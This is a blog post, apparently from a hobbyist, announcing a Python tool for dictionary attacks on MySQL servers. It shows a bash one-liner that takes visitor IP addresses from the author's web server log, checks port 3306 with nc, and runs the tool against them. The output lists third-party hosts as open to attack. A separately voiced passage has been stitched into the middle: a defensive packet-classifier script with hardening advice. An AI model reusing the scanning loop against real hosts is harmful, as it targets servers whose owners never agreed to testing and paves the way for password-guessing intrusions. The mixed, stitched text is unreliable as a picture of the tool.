After taking a few months to dilly about with Python and learn the ins and outs of it to a certain extent, I decided to write a program that does dictionary attacks on MySQL.
Plain text:
Tar archive:
MD5Sum: f0e07ca29cc783c6c27f3829f579d37e
The beauty of this program is that it actually tests the remote host and tells you whether or not it allows remote MySQL authentication.
Here’s a quick peek of it in action inside a bash shell script (IP addresses hidden of course):
:~/for i in $(httplast | egrep -v "${WANIP}|192\.168\." | awk '{print $1}' | sort | uniq); do nc -z -w1 ${i} 3306; if [[ "$?" == "0" ]]; then ./ -t ${i}; fi; done
Port 3306 on 115.##.##.#1 appears to be open..
A connection has been made and here are the results of the test:
This host does not allow remote administration on MySQL
Port 3306 on 62.##.##.#1 appears to be open..
A connection has been made and here are the results of the test:
This host is open to MySQL dictionary attacks!
Port 3306 on 66.##.##.#1 appears to be open..
A connection has been made and here are the results of the test:
This host is open to MySQL dictionary attacks!
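Seen from the server side, the two results above correspond to the first packet a MySQL server sends after the TCP connect: an ERR packet (code 1130) when no account matches the client's address, or a protocol handshake that invites authentication. The following is an added example, not the tool's code (the page does not show how the tool runs its test); the function names and sample packets are constructed for illustration.

```python
import struct

ER_HOST_IS_BLOCKED = 1129      # client blocked after too many connection errors
ER_HOST_NOT_PRIVILEGED = 1130  # no account matches the client's address


def classify_first_packet(data: bytes) -> dict:
    """Classify the first packet a MySQL server sends after TCP connect."""
    if len(data) < 5:
        return {"verdict": "not-mysql", "detail": "short read"}
    # Packet header: 3-byte little-endian payload length + 1-byte sequence id.
    length = int.from_bytes(data[0:3], "little")
    payload = data[4:4 + length]
    if length == 0 or len(payload) < length:
        return {"verdict": "not-mysql", "detail": "truncated packet"}
    if payload[0] == 0xFF and length >= 3:
        # ERR packet: 0xFF marker, 2-byte error code, then the message text.
        code = struct.unpack_from("<H", payload, 1)[0]
        msg = payload[3:].decode("latin-1")
        if code in (ER_HOST_IS_BLOCKED, ER_HOST_NOT_PRIVILEGED):
            return {"verdict": "remote-auth-refused", "code": code, "detail": msg}
        return {"verdict": "error", "code": code, "detail": msg}
    if payload[0] == 0x0A:
        # Handshake v10: protocol byte, then NUL-terminated server version.
        version = payload[1:].split(b"\x00", 1)[0].decode("latin-1")
        return {"verdict": "remote-auth-offered", "detail": version}
    return {"verdict": "not-mysql",
            "detail": "unknown first byte 0x%02x" % payload[0]}


def make_packet(payload: bytes, seq: int = 0) -> bytes:
    """Wrap a payload in the 4-byte MySQL packet header (sample data only)."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# Constructed samples: address from the documentation range, made-up version.
REFUSED = make_packet(
    b"\xff" + struct.pack("<H", ER_HOST_NOT_PRIVILEGED)
    + b"Host '203.0.113.7' is not allowed to connect to this MySQL server")
OFFERED = make_packet(b"\x0a" + b"8.0.36\x00" + b"\x2a\x00\x00\x00" + b"\x00" * 20)

if __name__ == "__main__":
    for name, pkt in (("refused", REFUSED), ("offered", OFFERED)):
        print(name, classify_first_packet(pkt))
```

A server that answers with the handshake is the case worth reviewing: restrict `bind-address` or firewall port 3306, and limit account host patterns so remote clients get the 1130 refusal instead.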
If you’re wondering what the command ‘httplast’ is, let me explain. I’m too lazy to type out: cat /var/log/apache2/access.log , so I created an alias to handle this for me.
The tool itself, I feel, is pretty self-explanatory, but if you have any questions feel free to leave a comment or shoot me an e-mail.